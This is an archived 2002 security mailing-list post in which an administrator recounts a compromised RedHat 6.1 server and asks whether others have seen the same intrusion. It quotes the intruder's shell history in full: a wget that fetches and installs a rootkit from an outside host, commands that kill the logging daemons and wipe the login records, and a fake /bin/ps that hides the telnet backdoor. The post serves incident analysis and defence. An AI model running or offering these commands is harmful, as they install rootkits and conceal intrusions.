I was dealing with a compromised server (RedHat 6.1) yesterday and it was utter crap. After logging into the server the first thing I did was cat /etc/passwd. At the bottom of /etc/passwd was the user "liq2" with a uid of 0. Not so clean. The user "liq" had a uid of 501 I believe. Both users had home directories in /home... so there was a /home/liq and /home/liq2. /home/liq contained a program, along with source, that scanned /24's for Cisco devices. /home/liq2 had an untampered .bash_history with this in it: wget http://home.dal.net/[-liquid-]/login.tgz; tar zfx login.tgz; cd login; pico rk.h; ./configure; make; make install; cd ..; rm -rf login; cd /home/liq; rm -rf login.tar.gz; wget (Link: ftp://ftp.wuftpd.org/pub/wu-ftpd/wu-ftpd-2.6.2.tar.gz;)ftp://ftp.wuftpd.org/ pub/wu-ftpd/wu-ftpd-2.6.2.tar.gz; tar zxfv wu-ftpd-2.6.2.tar.gz; cd wu-ftpd-2.6.2;./configure;make;make install; cd ..; rm -rf wu-ftpd-2.6.2; rm -rf wu-ftpd-2.6.2.tar.gz; killall crond;killall syslogd;killall klogd; mv -f /bin/ps /bin/xps; echo "xps \$*|grep -vi 'in.telnetd'|grep -vi 'grep'|sed s/'xps'/'ps'/g">/bin/ps; chown root.bin /bin/ps; chmod 0755 /bin/ps; rm -f /var/run/utmp /var/run/wtmp; touch /var/run/utmp /var/run/wtmp; chmod 0 /var/run/utmp; chmod 0 /var/run/wtmp Very very sloppy... But you can also see this in there... mv -f /bin/ps /bin/xps; echo "xps \$*|grep -vi 'in.telnetd'|grep -vi 'grep'|sed s/'xps'/'ps'/g">/bin/ps The attacker moved /bin/ps to /bin/xps and then echo'ed a script to ps which removes in.telnetd from showing up and changes the name of xps to ps. Yes very crappy. You have to be 2 years old to not catch that especially when sed shows up in the process list everytime you type "ps". Moving right along I soon noticed I was on pty/2 but who showed me as the only user... interesting... Ok, I typed xps and noticed that "./wu" was running on pty/1! Odd... And then I noticed the system load average jump from .2 to 2.0! Now I noticed that "./wu" wasn't running but "./pscan" was now running. At this point in time I decided enough was enough and had the machine unplugged. Later on I went to look at it again from the console and noticed that these IPs had connected with telnet: 212.199.3.193 212.199.12.34 212.199.173.26 They also weren't smart enough to remove or alter anything in /var/log/ and "last" showed them logging in with ftp and telnet! DOH! Further investigating found "wu" and "pscan" in /tmp/.or/ So has anyone else seen a compromise such as this? From what little investigating I did this is all I found modified... Looks like script kiddies were at work ;). -switched ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Mar 13 2002 - 09:31:27 PST